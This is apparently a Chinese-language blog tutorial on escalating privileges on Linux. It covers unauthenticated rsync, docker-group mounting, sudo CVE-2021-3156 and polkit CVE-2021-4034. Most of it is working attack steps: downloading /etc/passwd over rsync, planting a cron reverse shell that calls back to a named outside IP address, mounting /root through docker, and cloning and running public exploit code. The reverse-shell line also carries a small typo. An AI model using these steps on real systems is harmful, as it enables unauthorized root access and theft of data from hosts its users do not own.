Linux提权:Docker组挂载 && Rsync未授权 && Sudo-CVE && Polkit-CVE

目录

Rsync未授权访问

docker组挂载

Sudo-CVE漏洞

Polkit-CVE漏洞


这里的提权手法是需要有一个普通用户的权限,一般情况下取得的webshell权限可能不够

Rsync未授权访问

Rsync是linux下一款数据备份工具,默认开启873端口
https://vulhub.org/#/environments/rsync/common/
借助Linux默认计划任务调用/etc/cron.hourly,利用rsync连接覆盖
前提:没有账号密码验证 开放873端口

探针

rsync rsync://ip:873/

出现下面这种情况就说明存在未授权

Linux提权:Docker组挂载 && Rsync未授权 && Sudo-CVE && Polkit-CVE_第1张图片

思路一:下载获取对方的敏感文件

 到达对方的根目录

Linux提权:Docker组挂载 && Rsync未授权 && Sudo-CVE && Polkit-CVE_第2张图片

可以通过rsync下载敏感文件 /etc/passwd 到自己根目录 

rsync rsync://ip:873/src/etc/passwd ./

思路二:覆盖定时文件,定时反弹shell

Linux系统的定时任务一般在 /etc/crontab

可以本地构造一个反弹 shell 的定时任务 nc

/bin/bash -i >& /dev/tcp/47.94.236.117/3333 0>&i

赋予执行权限

chmod +x nc

上传文件覆盖定时任务目录下

rsync -av nc rsync://ip:873/src/etc/cron.hourly

下载文件

rsync -av rsync://47.94.236.117:873/src/etc/passwd ./

本地监听反弹 shell 即可

nc -lvnp 3333

docker组挂载

条件:普通用户在docker组

原理:利用docker服务启动镜像挂载目录、从而来访问root目录、etc目录等敏感文件来进行权限提升。因为docker的运行本身就需要root权限。

漏洞复现:

常见一个普通用户,并放到docker组内

useradd -d /home/test -m  test
passwd test
usermod -G docker test
newgrp docker

利用

发现对方主机上存在docker服务,敲docker相关命令,判断有么docker相关的服务

groups 用户名 查看当前用户是否在docker组内

从Docker上下载alpine镜像,使用参数 -it 进入 容器shell

docker run -v /root:/mnt -it alpine

这样就可以实现非root用户访问敏感文件,在尝试进行提权

Sudo-CVE漏洞

漏洞探针:这是版本漏洞,在版本区间都会受到影响

sudo: 1.8.2 - 1.8.31   p2
sudo: 1.9.0 - 1.9.5     p1

执行命令,看是否报错

sudoedit -s /

若不报错,提示sudio的usage信息;报错:

利用:下载EXP直接攻击

// 下载EXP

git clone https://github.com/blasty/CVE-2021-3156.git
cd CVE-2021-3156

// 编译一下
make

// 给执行权限
chmod a+x sudo-hax-me-a-sandwich

// 执行脚本 1是选择模式
./sudo-hax-me-a-sandwich 1

Linux提权:Docker组挂载 && Rsync未授权 && Sudo-CVE && Polkit-CVE_第3张图片

Polkit-CVE漏洞

漏洞影响2009年5月至今的所有polkit版本
由于polkit是系统预装工具,所有存在polkit的linux系统均受影响
如:CentOS、Ubuntu、Debian、Redhat、Fedora、Gentoo、Mageia等

探针  

dpkg -l policykit-1

存在漏洞:

不存在漏洞

Linux提权:Docker组挂载 && Rsync未授权 && Sudo-CVE && Polkit-CVE_第4张图片

git clone https://github.com/berdav/CVE-2021-4034.git
cd CVE-2021-4034/
make
./cve-2021-4034

你可能感兴趣的:(权限提升,linux,docker,运维)